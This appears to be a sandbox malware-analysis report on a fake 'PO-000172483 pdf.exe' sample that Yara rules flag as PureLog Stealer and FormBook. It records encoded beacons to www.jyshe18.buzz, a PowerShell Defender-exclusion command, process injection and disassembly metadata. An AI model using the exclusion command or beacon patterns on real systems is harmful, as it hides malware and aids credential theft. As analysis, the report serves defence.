Jan 8, 2025 12:50:03.067827940 CET	1690	OUT	POST /1lpi/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 1244 Connection: close Host: www.jyshe18.buzz Origin: http://www.jyshe18.buzz Referer: http://www.jyshe18.buzz/1lpi/ User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1) Data Raw: 6f 56 55 78 54 4c 4f 3d 61 4d 53 46 4f 74 34 36 67 50 45 6d 49 54 7a 46 62 58 50 49 30 58 56 75 78 47 79 34 69 6d 79 33 54 76 50 46 76 52 39 4b 6d 78 70 6f 42 6a 38 43 44 4f 52 31 4e 69 6c 75 68 43 56 2f 68 65 6c 6e 6f 6a 44 56 35 76 6e 52 73 70 66 73 4b 47 63 77 42 6b 61 35 38 33 78 31 6d 51 37 5a 4f 36 6e 43 4f 35 49 4e 47 44 7a 42 78 74 46 55 61 34 79 50 38 6b 55 43 53 78 30 47 6a 52 73 67 4a 45 62 4b 51 44 6f 78 67 4f 46 51 33 5a 65 50 69 35 69 2f 76 67 44 56 34 65 46 59 4a 76 58 2f 5a 4e 42 7a 4d 6e 6e 59 70 69 6a 6a 31 43 58 57 51 6d 69 31 69 59 43 63 38 34 74 32 55 4b 65 76 4f 6a 64 39 37 4e 50 52 77 74 39 62 4e 50 54 46 59 49 56 6a 64 54 43 39 55 75 4a 4e 7a 42 37 43 34 4d 53 77 5a 4d 41 38 32 31 78 58 48 77 6c 43 41 49 47 66 6f 7a 79 4a 58 75 73 32 70 55 32 55 61 6e 64 71 30 7a 72 73 73 4d 46 69 6b 30 41 76 33 6a 65 38 41 50 34 52 70 39 39 33 35 63 4e 39 37 6a 4c 4c 68 41 69 6b 69 4b 48 6c 7a 6e 44 63 77 6c 33 51 39 69 4e 76 61 55 33 44 77 4d 65 76 49 56 35 43 45 48 66 57 54 39 66 58 78 6d [TRUNCATED] Data Ascii: oVUxTLO=aMSFOt46gPEmITzFbXPI0XVuxGy4imy3TvPFvR9KmxpoBj8CDOR1NiluhCV/helnojDV5vnRspfsKGcwBka583x1mQ7ZO6nCO5INGDzBxtFUa4yP8kUCSx0GjRsgJEbKQDoxgOFQ3ZePi5i/vgDV4eFYJvX/ZNBzMnnYpijj1CXWQmi1iYCc84t2UKevOjd97NPRwt9bNPTFYIVjdTC9UuJNzB7C4MSwZMA821xXHwlCAIGfozyJXus2pU2Uandq0zrssMFik0Av3je8AP4Rp9935cN97jLLhAikiKHlznDcwl3Q9iNvaU3DwMevIV5CEHfWT9fXxmcR2ywS/rl7TwVTzxRc7C96x0vK2VWI6dDiOb5nerJzN+YEI1cF2bMiHC3l0QHNUmRtEDq1P11BSXNeOUvbsT2UeG0WT8ZGNtTq8XkTIsufw5t/y3Y6XhUEt901oDlTHEKfz+yUkS6ilV0FTr4LEb98DKnS/jvmqlJGw/f/nV2PxBM+yp22eTs1C3wznSBbhPCUU4YK4dODA+qLpZocm/LkI2lQY9oNJmIU+T1sK4MMgp+TjBhvKm6jDKLK6TUWCb7bzhupTcFrqIBbT1cSPRVdWUAfMK5AuypTqgLtU/Agfv6HtMNbaWYAKrlq3yhL9xtlKN9EVPA4mTObXKy3bIvi7NhCVGl4OO4uHXN98XVOm5L/iqqPN3S5Vxb4NbGVghq6M0Xfi6cmSnNDwj0LoMvqelUa2ryQ4xsHxRUMEmvNNtwOBRG/5swqNNWtLdetTTo77Hv31Em83aK0FDE/4U0xomWgVQEvjdGvYmCgada7MrXqt61jCO1CzHpJPJJoZyeUtfbt3XO45Ptu59Qlwe/c/ysSk+2NbLSQ7q9wuK5RQz0ONFEYe0bQcrlYkldET5lMXdXBR5NuXuLYKz6yjmBkta4wzrV9I5n0G+h01MKCj8oJdbKCXA8U6xYBHnazG2MCX4oaIIvLcKLzwI0oruH1CA3OvEmH7AMO [TRUNCATED]
Jan 8, 2025 12:50:03.679008007 CET	1236	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 08 Jan 2025 11:50:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Location: http://www.jyshe18.buzz/ X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Referrer-Policy: no-referrer-when-downgrade Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self'; Permissions-Policy: interest-cohort=() cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7R5nMB9RdRp2NM83HheQzQ1%2Fhfo4gk7GHGTzNPe7mxTEZZue8oVgqFwiuhM%2Ba%2B300Kum1zLZiBNJdX59xKw%2BkNRfTgNAYw2hHqatGpL8W35XloLTtpGj3Z3%2BKDM1uQAE%2F%2Foz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8febf7bf9dc34273-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1988&min_rtt=1988&rtt_var=994&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1690&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center>
Jan 8, 2025 12:50:03.679028034 CET	26	IN	Data Raw: 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: </body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	57583	172.67.131.144	80	3964	C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 12:50:05.611571074 CET	397	OUT	GET /1lpi/?oVUxTLO=XO6lNaUCtrQGcU2VODzQ73da62+/1UDsd9ytkxpugSckEiM1CKodZj4VrjBa4PsrlwO68eKRpavYImQlE0qwziVyxSffRIbkHLMEPAX10bxXVuSg8lNjbht32mQfRiSCPg==&9DQxz=BXUp_jixat HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.jyshe18.buzz User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Jan 8, 2025 12:50:06.236671925 CET	1236	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 08 Jan 2025 11:50:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Location: http://www.jyshe18.buzz/ X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Referrer-Policy: no-referrer-when-downgrade Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self'; Permissions-Policy: interest-cohort=() cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HsVjAJnOeiDJE8AsQ%2FikAoocpg5L6n8fBbgOkdKj0c0GX6T7TlqUHKENy3y8d5uAAfz27HOck7WlTOTTM2Gb%2BN08nntdem3gUhHFIxARQ%2Fhr698Dcd3%2Bk6r9%2BXuBHlwDQtJS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8febf7cfab950f4b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1479&min_rtt=1479&rtt_var=739&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=397&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></b
Jan 8, 2025 12:50:06.236690044 CET	22	IN	Data Raw: 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: ody></html>0

Target ID:	0
Start time:	06:48:00
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\PO-000172483 pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO-000172483 pdf.exe"
Imagebase:	0x120000
File size:	905'216 bytes
MD5 hash:	129FDE986D0F28D1D4DC333FD8A97478
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2090320439.0000000008FB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2082693969.0000000003D95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2082693969.0000000003DD7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:48:02
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-000172483 pdf.exe"
Imagebase:	0x2c0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:48:02
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\PO-000172483 pdf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\PO-000172483 pdf.exe"
Imagebase:	0x120000
File size:	905'216 bytes
MD5 hash:	129FDE986D0F28D1D4DC333FD8A97478
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:48:02
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:48:02
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\PO-000172483 pdf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\PO-000172483 pdf.exe"
Imagebase:	0x200000
File size:	905'216 bytes
MD5 hash:	129FDE986D0F28D1D4DC333FD8A97478
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:48:02
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\PO-000172483 pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO-000172483 pdf.exe"
Imagebase:	0xb40000
File size:	905'216 bytes
MD5 hash:	129FDE986D0F28D1D4DC333FD8A97478
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2610991232.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2611689620.0000000001600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2612889550.0000000003860000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:48:44
Start date:	08/01/2025
Path:	C:\Windows\System32\wbem\WMIADAP.exe
Wow64 process (32bit):	false
Commandline:	wmiadap.exe /F /T /R
Imagebase:	0x7ff67c150000
File size:	182'272 bytes
MD5 hash:	1BFFABBD200C850E6346820E92B915DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	06:48:48
Start date:	08/01/2025
Path:	C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe"
Imagebase:	0xa80000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	06:48:52
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\cttune.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\cttune.exe"
Imagebase:	0xec0000
File size:	72'192 bytes
MD5 hash:	E515AF722F75E1A5708B532FAA483333
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3289765947.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3289827592.0000000004810000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	06:49:04
Start date:	08/01/2025
Path:	C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe"
Imagebase:	0xa80000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	06:49:16
Start date:	08/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	13.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.8%
Total number of Nodes:	316
Total number of Limit Nodes:	22

Executed Functions

Function 090E0328 Relevance: 8.5, Strings: 6, Instructions: 1029
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xb`q, xrefs: 090E0458
4']q, xrefs: 090E0F1F
Te]q, xrefs: 090E0B7F
paq, xrefs: 090E0FF6
\ lw, xrefs: 090E0731
TJbq, xrefs: 090E04CE

Memory Dump Source

Source File: 00000000.00000002.2098138004.00000000090E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90e0000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: 4']q$TJbq$Te]q$\ lw$paq$xb`q
API String ID: 0-2822081767
Opcode ID: a3859550c80c22640009e149085f8f4f5587887c9592c9131472528f652dbbbc
Instruction ID: 57dbc89aaedf1604b60742b8d7509fa8e4eeec3ff3ddb9320b9a787cc2aa3191
Opcode Fuzzy Hash: a3859550c80c22640009e149085f8f4f5587887c9592c9131472528f652dbbbc
Instruction Fuzzy Hash: 1BB2D375E00628CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB225DB319E81CF40

Function 00BA3470 Relevance: 5.3, Strings: 4, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[TR., xrefs: 00BA37E7
[TR., xrefs: 00BA37E0
Vh~_, xrefs: 00BA3810
3, xrefs: 00BA3708

Memory Dump Source

Source File: 00000000.00000002.2076541249.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: Vh~_$[TR.$[TR.$3
API String ID: 0-1393618026
Opcode ID: ec93545d7596328d69ddd2e216c406758970ff532172cb3e4f625c194e819e0d
Instruction ID: c344131125d598d3d955f94d3ff591b68e87c2b815f7691139397fe47d957fe7
Opcode Fuzzy Hash: ec93545d7596328d69ddd2e216c406758970ff532172cb3e4f625c194e819e0d
Instruction Fuzzy Hash: F6C10570D0520ADFCB44CF99D4818AEFBF2FF8A340B64D596E416AB214D734AA42CF94

Function 00BA3377 Relevance: 4.1, Strings: 3, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[TR., xrefs: 00BA37E7
Vh~_, xrefs: 00BA3810
3, xrefs: 00BA3708

Memory Dump Source

Source File: 00000000.00000002.2076541249.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: Vh~_$[TR.$3
API String ID: 0-656669931
Opcode ID: c5e7f7e3a26279465b028057f991fcbfd3f579318f651c6200ab85ee2eaa632e
Instruction ID: 1bbc9ed7139d08ca711f5a1a138bbfc2388c26fbbf44023dce61bc39d4f10d7c
Opcode Fuzzy Hash: c5e7f7e3a26279465b028057f991fcbfd3f579318f651c6200ab85ee2eaa632e
Instruction Fuzzy Hash: 33D17CB4D092469FC705CFA9D4844AEFBF2FF8A300B25C59AD406AB255D734AA42CF94

Function 00BA359C Relevance: 4.0, Strings: 3, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[TR., xrefs: 00BA37E7
Vh~_, xrefs: 00BA3810
3, xrefs: 00BA3708

Memory Dump Source

Source File: 00000000.00000002.2076541249.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: Vh~_$[TR.$3
API String ID: 0-656669931
Opcode ID: 68b28ac52f95538c5619b33fed3df496cc5d70c3f773f6c604c3445b89f8afc2
Instruction ID: 567c0487fd2b5bf36415b697a5c09d35a6dd1c5b81796b0cd8968f7f7617b23c
Opcode Fuzzy Hash: 68b28ac52f95538c5619b33fed3df496cc5d70c3f773f6c604c3445b89f8afc2
Instruction Fuzzy Hash: 74B1E67090520ADFCB44CF99D4818AEFBF2BF4A740B64D595E416AB214D734AA42CF94

Function 00BA3895 Relevance: 4.0, Strings: 3, Instructions: 233
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[TR., xrefs: 00BA37E7
Vh~_, xrefs: 00BA3810
3, xrefs: 00BA3708

Memory Dump Source

Source File: 00000000.00000002.2076541249.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: Vh~_$[TR.$3
API String ID: 0-656669931
Opcode ID: c8baaa8ae30a935475a0759a83d2e3254b4f1b6cc632ba85102f6c0805db43bf
Instruction ID: cc9652ea21cfd85c43025b4cbbcf989a3b9d96c8efb93659b248751d65181e76
Opcode Fuzzy Hash: c8baaa8ae30a935475a0759a83d2e3254b4f1b6cc632ba85102f6c0805db43bf
Instruction Fuzzy Hash: 39A1F770D0520ADFCB44CF99D4818AEFBF2FF4A740B249596E416AB214D734AA42CF94

Function 00BA35EA Relevance: 4.0, Strings: 3, Instructions: 228
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[TR., xrefs: 00BA37E7
Vh~_, xrefs: 00BA3810
3, xrefs: 00BA3708

Memory Dump Source

Source File: 00000000.00000002.2076541249.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: Vh~_$[TR.$3
API String ID: 0-656669931
Opcode ID: 22b07e3f66bf127f5b872db042442fe3f086568299674f1d4fb87ce9270c3b55
Instruction ID: ba85d265f53075387de37361e1a607e3f4f9f5ff6d390a273b4ddde87cf2c979
Opcode Fuzzy Hash: 22b07e3f66bf127f5b872db042442fe3f086568299674f1d4fb87ce9270c3b55
Instruction Fuzzy Hash: 7AA1F770D0520ADFCB44CF99D4818AEFBF2FF8A740B24D595E416AB214D734AA42CF94

Function 00BA1416 Relevance: 2.7, Strings: 2, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 00BA14A9
Te]q, xrefs: 00BA1657

Memory Dump Source

Source File: 00000000.00000002.2076541249.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: Te]q$Te]q
API String ID: 0-3320153681
Opcode ID: e02900e13ecaafefb9a82558baa97527cd4850460a7ab2cac9d605dd7c5b1f90
Instruction ID: ba075bedf777564163daa8b2747c92c25480bbc2264513580d7b84a4314d81d5
Opcode Fuzzy Hash: e02900e13ecaafefb9a82558baa97527cd4850460a7ab2cac9d605dd7c5b1f90
Instruction Fuzzy Hash: 8291D075E052098FDB08CFA9C994AEEFBF2BF89300F24846AD415AB364D7349906CF54

Function 00BA1440 Relevance: 2.7, Strings: 2, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 00BA14A9
Te]q, xrefs: 00BA1657

Memory Dump Source

Source File: 00000000.00000002.2076541249.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: Te]q$Te]q
API String ID: 0-3320153681
Opcode ID: bbbe032ec49ee76fa47e9de5e88c89975adc8602bb82c5afb29f8bc4cea1f76a
Instruction ID: 31c23e971af751c479f3321207862f5c71b803ecdd2fafd172b9ba4b36a02399
Opcode Fuzzy Hash: bbbe032ec49ee76fa47e9de5e88c89975adc8602bb82c5afb29f8bc4cea1f76a
Instruction Fuzzy Hash: 4E81B174E042198FDB48CFE9C994AEEBBF2BF89300F24846AD415AB364D7309906CF54

Function 00BA0814 Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00BA9C55

Memory Dump Source

Source File: 00000000.00000002.2076541249.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO-000172483 pdf.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: d794a0bb62b064a54d8f6327d4f7ec65b5e0b815936c0af4602be16e29f73838
Instruction ID: 6271a30284e875e29c4d111bb786298aa513304445db7fc4d673b4aa11c1318e
Opcode Fuzzy Hash: d794a0bb62b064a54d8f6327d4f7ec65b5e0b815936c0af4602be16e29f73838
Instruction Fuzzy Hash: 254168B9D042589FCB10CFA9D984A9EFBF5FB09310F10906AE918B7310D335A945DF68

Function 00BA9B99 Relevance: 1.6, APIs: 1, Instructions: 102nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00BA9C55

Memory Dump Source

Source File: 00000000.00000002.2076541249.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO-000172483 pdf.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 365e854399d17366b8f31f8f099719e189d611cde3fbc34216e84abd9352d25d
Instruction ID: 8a2d1538625fcd6c19c5774576ef1366dad98c14692ab811e116ded43d2ef1e2
Opcode Fuzzy Hash: 365e854399d17366b8f31f8f099719e189d611cde3fbc34216e84abd9352d25d
Instruction Fuzzy Hash: E94164B9D042589FCB10CFA9D984A9EFBF1BB19310F20A06AE818B7210D375A945CF65

Function 02511DE0 Relevance: 1.5, Strings: 1, Instructions: 284COMMON

Download Yara Rule

Strings

Pp]q, xrefs: 02511FB2

Memory Dump Source

Source File: 00000000.00000002.2079112530.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: Pp]q
API String ID: 0-2528107101
Opcode ID: 77b267836b350a5956c795eadd15c260f6ce3579ca8521613d8bc9c2a1f15aea
Instruction ID: fc7b572ae717c13d75e46318fe8b51b8f8bddd5242a7bf9a65c303aa9aaf46d1
Opcode Fuzzy Hash: 77b267836b350a5956c795eadd15c260f6ce3579ca8521613d8bc9c2a1f15aea
Instruction Fuzzy Hash: B4D1F774E002188FDB54DFA9D980A9EBBF2FF88300F1085AAD419AB365DB345E85CF51

Function 02511DF0 Relevance: 1.5, Strings: 1, Instructions: 277COMMON

Download Yara Rule

Strings

Pp]q, xrefs: 02511FB2

Memory Dump Source

Source File: 00000000.00000002.2079112530.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: Pp]q
API String ID: 0-2528107101
Opcode ID: 66a4f05109a4daa210f43d828ca760fe25031077f633241e4e96980f7088319d
Instruction ID: 69726cb516f64799161c318ebe3d516ec1190648335ddb76df1c2db9999c476b
Opcode Fuzzy Hash: 66a4f05109a4daa210f43d828ca760fe25031077f633241e4e96980f7088319d
Instruction Fuzzy Hash: D5D1C774E002189FDB54DFA9D980A9EBBF2FF88300F1085AAD419AB355DB349E45CF51

Function 00BAA6F2 Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

t|-, xrefs: 00BAA80D

Memory Dump Source

Source File: 00000000.00000002.2076541249.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

